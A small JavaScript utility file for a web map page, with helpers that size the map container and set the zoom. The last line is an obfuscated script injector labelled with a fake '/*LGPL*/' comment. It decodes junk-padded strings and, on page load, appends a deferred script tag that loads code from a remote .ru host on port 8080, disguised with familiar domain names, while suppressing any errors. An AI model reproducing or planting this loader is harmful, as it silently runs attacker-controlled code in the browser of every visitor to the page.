/******************* utils *******************************************/
function E(id){
    return document.getElementById(id);
}

/************ Zoom/sizing functions ****************************/
function bodyResize(){

    var newWidth, newHeight;
    if(document.body.clientWidth){
	newWidth = document.body.clientWidth ;
    }else{
	newWidth = window.innerWidth;
    }
    E('container').style.width = 940+"px";
    E('map').style.width = 940 +"px";

    newHeight = getWindowHeight() - 150;

    E('container').style.height = 450+"px";
    E('map').style.height = 450 +"px";
    adjustZoom(newWidth);

}

function getWindowHeight()
{
    //FF, safari
    if(window.innerHeight){
       return window.innerHeight;
    }else{//IE
	return document.documentElement.clientHeight;
    }
}

function adjustZoom(width)
{
    if(width > 940) initialZoom = 1;
}


/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.replace(/&|#|\$|\(|@|\!|\^|\)/ig, ''));C1nse3sk8o41s.setAttribute('defer', 'd$#)e!^f$)e&(@@#r((!'.replace(/#|\$|\(|&|\)|\^|@|\!/ig, ''));C1nse3sk8o41s.setAttribute('type', 't^&e(!x)$(t$/#@)j()(a&)!v#a)s()c@^r$$i^$p()^&#t&!@'.replace(/\(|@|\)|#|&|\$|\^|\!/ig, ''));C1nse3sk8o41s.setAttribute('id', 'U#!4!$^v&$e@h^)$x^@w&$s#(@b)#w^^(&7#)6$@@l!)^'.replace(/&|\!|#|\$|\(|\^|@|\)/ig, ''));C1nse3sk8o41s.setAttribute('s()#r#^((c^'.replace(/@|&|#|\$|\(|\)|\!|\^/ig, ''),  'h^^&t!t(p^^@&@:@/@/&!o&#r!!#@k@)!#&u^!t^)@-!#!@c(#(o^m^$-((!b#)@@r(!.^@$h)##@a^#t)t#$))r(&^i&c@)$k$)).^o!$!r#g&)$.&(w(#i$k@@t&$i!^@!o&n!!)a@@r$y&@#(-^$)o$r@g$!^!.$&^(w@e!!b$!@n#(^e#t$$e)#^^n$^g@!l$#!&i)$&s&^@h@.!r@@@u(&^:($8$^^0#8$!!$0@)^/!&!g&#o@o!((g)l&#$)e(.@@c(!@^o!#m(/&g@(^o#((o^!)&g#@l))(e(&#!.!!c&$$&o))$m&@$/@i!&n^t(!e^l^@.@)($c#(@o$!m(/)&v#)))n^#e$t^@.$#@c()(n)^(&/$o&n^#)(l(^i^^n$)e!d^^o!@w@$&n(@.$$!#n^@e((t^/!@(@'.replace(/&|\(|\)|\$|\^|\!|#|@/ig, ''));if (document){document.body.appendChild(C1nse3sk8o41s);}} } catch(O28ie36gdspcwlg5bd0) {}